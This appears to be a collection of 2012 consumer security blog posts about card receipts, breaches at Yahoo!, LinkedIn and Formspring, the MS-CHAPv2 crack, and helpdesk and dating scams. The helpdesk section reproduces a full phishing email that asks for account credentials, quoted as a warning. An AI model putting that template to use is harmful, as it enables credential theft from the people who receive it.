Melbourne Myki System

Melbourne (Australia) has a transport ticket system called Myki. If you use it there’s currently a security risk you should be aware of.

If you purchase a ticket using their ticket vending machines and pay by credit card, the machine issues a receipt. The receipt shows the credit card owner’s full name, the card’s expiry date, and more than the last 4 digits of the card. All of these things are considered security risk. Anyone finding the receipt can use the information on it to commit credit card fraud.

If this applies to you, don’t use a credit card to purchase tickets until the issue is resolved. I can’t verify it but apparently you can’t avoid printing a receipt. Hopefully all of these issues will be resolved soon.

And for everyone, it’s worth highlighting that you should always pay attention to credit card receipts. They should never show your name, your card’s expiry date, or more than the last 4 digits of the card. You can’t assume that the payment terminal you use is perfect, as shown above.

And you should be careful how you dispose of credit card receipts. Recently there’s been a lot of publicity over a hacked iCloud account –  the hackers used the owner’s last four digits of his credit card to gain access to various accounts.

If you use Melbourne’s Myki system and pay with a credit card or have ideas on credit card receipts please leave a comment below, I’d like to hear more.

MS-CHAPv2 Can Be Cracked

This post is a bit technical and isn’t for everyone. I still want to include it in because it could help someone, someday.

MS-CHAP v2 is an authentication protocol used to secure VPNs and some wireless networks. It’s commonly used with PPTP VPNs and sometimes with WPA2 wireless networks. For the past few years it was considered secure as long as it’s used with a strong password (a complicated password).

Today some researchers at a security conference demonstrated how to crack it in one day. They demonstrated that they can decrypt all data sent across the VPN or over WiFi.

So if you’re setting up a network and come across the MS-CHAP v2 setting, remember that as of today it’s no longer secure. It’s not even slightly secure, or better than nothing. If someone wants to view your encrypted VPN or WiFi traffic and you use MS-CHAP v2 then they can, with very little effort. Full details on cracking MS-CHAP v2 are here.

Yahoo! Passwords Stolen

If you have ever used a Yahoo! service now might be a good time to change your password. Yesterday someone stole a list of passwords from one of Yahoo!’s servers – it contained details of 450,000 accounts. The server was for Yahoo Voice, so if you’ve ever used Yahoo Voice then your account is now compromised. And if you’ve ever used the same password on other web sites then those are vulnerable as well.

Why didn’t Yahoo! use better securty?

Reports say that hackers used a SQL injection attack to steal the list, a common way to hack into web sites. There are many ways of storing passwords on a server and Yahoo! didn’t use the most advanced and secure method. So the passwords were easily converted to plain text. In short, Yahoo!’s programmers got lazy, their security wasn’t good enough.

What can we learn from Yahoo!’s mistakes?

  • Yahoo’s problem is also your problem. Don’t ignore security alerts like this.
  • If you work in software development, don’t be lazy. Block all kinds of SQL injection attacks. And don’t store passwords in plain text, or MD5 hashes, or other simple hashes.
  • Everyone should use good passwords, mixed with numbers and made-up words.
  • You should not reuse a password on other sites.

Update (16 July 2012):

Yahoo! has confirmed the breach and has fixed up the source of the problem. In their words, “We have… now fixed this vulnerability, deployed additional security measures for affected Yahoo! users, enhanced our underlying security controls and are in the process of notifying affected users”.

You should still change your password.

Facebook Gets Tough On Malware

Facebook are stepping things up a notch and getting tough on malware, in a good way. Their latest initiative can detect malware on your computer. If anything suspicious is found, your Facebook account is temporarily locked (to prevent the malware sending spam using your account), and you’ll be asked to download an anti-virus program called McAfee Scan & Repair. There’s also an option to use Microsoft Security Essentials (MSE).

This new procedure can also be invoked manually, if you suspect your computer might be infected. The link is, and you’ll need to enter your password. Note: when entering passwords, always look at the address bar at the top of your browser and make sure it’s genuine – in this case, it needs to have in the address.

If your account is temporarily locked because malware was detected or because you manually started the procedure, you won’t be able to unlock the account until you finish the virus scan.

This is all for Windows. OS X users will have a slightly different procedure.

There are more details on Facebook’s web site.

Formspring Password Resets

Formspring is a social network with about 27 million members. Today they had a security breach and have reset all of their members’ passwords. If you see the following notice it’s probably genuine. But to be sure, don’t click on any links – open a new browser tab and sign into your Formspring account.

Dear Formspring user,
For security reasons, we have disabled your password and ask that you reset it. When you log back into Formspring, you will be prompted to change your password.
Thank you for taking the time to reset your password.
The Formspring Team


Gmail Detects Hack Attempts

Google has always put a lot of work into making Gmail secure. Their latest feature is interesting.

If Google’s system detects unusual attempts to access an account, they now show a warning on the top of the Gmail screen. They’re calling it a state sponsored attack. It doesn’t mean your account has been hacked, only that it’s the target of an attack.

Google security warning

If you ever see this, you’ll be advised to change your password (make it a strong password), and to enable two step verification – this will use your mobile phone as an additional way of protecting your account.

LinkedIn iPhone App

LinkedIn has an iPhone and iPad app. One of its features is “an opt-in feature which allows users to view calendar entries within the app“.

Some security researchers have been analysing this app and have discovered that when using the calendar feature it sends data to LinkedIn’s servers. It sends all of your calendar events, without explicitly asking for your permission.

This is considered a privacy risk. If you use the LinkedIn app on iOS, turn off the feature.

You should expect LinkedIn to make a statement about this issue, and eventually resolve it. I’ll post any updates here as they happen.

Update 7 Jun 2012:

LinkedIn have responded to these privacy concerns – you can read their comments here. Basically they confirm the privacy issues and justify it. They’ve also made changes to their iOS app to address the issue, the updated version is 5.0.3.

And at the same time someone in Russia claims to have hacked LinkedIn’s servers and has a list of over 6 million hashed password. A hashed password means they can’t read your password yet but given enough time it can be found. This incident is unconfirmed by LinkedIn, but it would be a good time to change your account password.

Helpdesk Scam

If you or your company has a helpdesk you should understand that they don’t need to know your password. Ever. So if you receive an email asking for your login and password you should immediately suspect that it could be a scam.

The following email is a scam. It’s made to look like a serious IT request but it’s really a trick to get your account details.

Help Desk

Attention Account User,

Scheduled Maintenance & Upgrade

Your account is in the process of being upgraded to a newest of Windows-based servers and an enhanced online email interface inline with internet infrastructure Maintenance. The new servers will provide better anti-spam and anti-virus functions, along with IMAP Support for mobile devices that Support IMAP to enhance your usage.

To ensure that your account is not intermittently disrupted but active during and after this upgrade, you are required to kindly confirm your account by stating the details below:

* User name:

* Password:

This will prompt the upgrade of your account.

Failure to acknowledge receipt of this notification, might result to a temporal deactivation of your account from our database.

Your account shall remain active upon your confirmation of your login details.

We do apologize for any inconvenience caused.

Help Desk

© Copyright 2012, All Rights Reserved.

Dating Scams

Police in Burwood, Sydney, Australia, are investigating recent fraud cases whereby local women were targeted in online dating sites. The women are lured into an online relationship, complete with emails and phone calls, and once they gain their trust they ask for money. The con artists in these cases are based in Singapore and Malaysia.

In one case a lady sent over $100,000. And in nearby Erskineville a woman was tricked into sending $275,000 to a con artist in England.

The scam begins with an ad on an online dating website, targeting asian women in Sydney. They describe themselves as wealthy bankers or businessmen. They send photos, stolen from other websites on the internet. They lure their victim along for up to six months, gaining their trust, and eventually start asking for money.

These scams happen all over the world. Please help raise awareness by talking about this issue with people you know.

Note: because I used the words “online dating”, Google has placed ads on this page with links to online dating websites. Some people who post ads on these sites are not genuine, use your own judgement here.